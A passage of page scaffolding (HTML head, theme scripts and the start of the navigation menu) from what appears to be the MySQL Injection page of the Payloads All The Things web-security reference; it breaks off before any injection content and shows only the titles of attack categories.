
<!doctype html>
<html lang="en" class="no-js">
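<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<!-- Canonical, prev and next use percent-encoded path segments; the og:image and twitter:image URLs further down are encoded the same way so that every absolute URL on the page agrees (literal spaces are not valid in a URL). -->
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MySQL%20Injection/">
<link rel="prev" href="../MSSQL%20Injection/">
<link rel="next" href="../OracleSQL%20Injection/">
<link rel="icon" href="../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.49">
<title>MySQL Injection - Payloads All The Things</title>
<link rel="stylesheet" href="../../assets/stylesheets/main.6f8fc17f.min.css">
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<!-- Third-party font CSS. Google Fonts serves user-agent-specific CSS, so a fixed SRI hash is not applicable here; under a CSP the page needs fonts.googleapis.com in style-src and fonts.gstatic.com in font-src. -->
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../custom.css">
<!-- Theme-state helpers: __md_get/__md_set read and write JSON under localStorage keys prefixed with the site root path (__md_scope). __md_set swallows storage errors (quota, disabled storage); __md_get does not guard JSON.parse, so a malformed stored value throws in whichever inline script calls it (e.g. the palette restore in the header). Inline <script>/<style> on this page require 'unsafe-inline' or nonces/hashes under a CSP. -->
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website">
<meta property="og:title" content="MySQL Injection - Payloads All The Things">
<meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/SQL%20Injection/MySQL%20Injection.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="630">
<meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MySQL%20Injection/">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="MySQL Injection - Payloads All The Things">
<meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/SQL%20Injection/MySQL%20Injection.png">
</head>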
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<!-- Drawer and search state live in two hidden checkboxes that the theme's labels (for="__drawer" / for="__search") toggle; autocomplete="off" presumably stops browsers restoring a stale checked state on reload. -->
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<!-- Skip link: jumps keyboard users past header and sidebar to the page's first heading anchor (#mysql-injection). -->
<div data-md-component="skip">
<a href="#mysql-injection" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../.." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
MySQL Injection
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<!-- Restores the persisted colour palette. Reads "__palette" through __md_get (localStorage, keyed by site path). When the stored media is the generic "(prefers-color-scheme)", it resolves to whichever of the two palette radio inputs in the form above matches the OS preference and copies that input's data-md-color-* values; then every key in palette.color is written to <body> as data-md-color-<key>. The values come from this origin's localStorage, so they are only as trusted as the origin itself; the attribute name is always prefixed with "data-md-color-", and setAttribute rejects an invalid name rather than writing it. __md_get does not catch JSON.parse errors, so a malformed stored value aborts this script and the palette is simply not restored. Inline script: needs a hash or nonce under a CSP. -->
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<!-- Search option controls. The share control is an <a href="javascript:void(0)"> acting as a button (data-clipboard / data-clipboard-text presumably hook a clipboard library that fills the text at runtime); a <button type="button"> would be the semantic choice and would also avoid a javascript: URL, but the theme's CSS and JS target this element as written, so it is left unchanged here. Both controls carry tabindex="-1" and are reachable only by pointer or script. -->
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../.." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../.." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../DISCLAIMER/" class="md-nav__link">
<span class="md-ellipsis">
DISCLAIMER
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key and Token Leaks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../API%20Key%20Leaks/IIS-Machine-Keys/" class="md-nav__link">
<span class="md-ellipsis">
IIS Machine Keys
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Account%20Takeover/mfa-bypass/" class="md-nav__link">
<span class="md-ellipsis">
MFA Bypasses
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
Client Side Path Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Client%20Side%20Path%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Cross Site Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Cross Site Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Cross-Site%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DOM Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DOM Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../DOM%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
DOM Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Denial of Service
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Denial of Service
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Denial%20of%20Service/" class="md-nav__link">
<span class="md-ellipsis">
Denial of Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
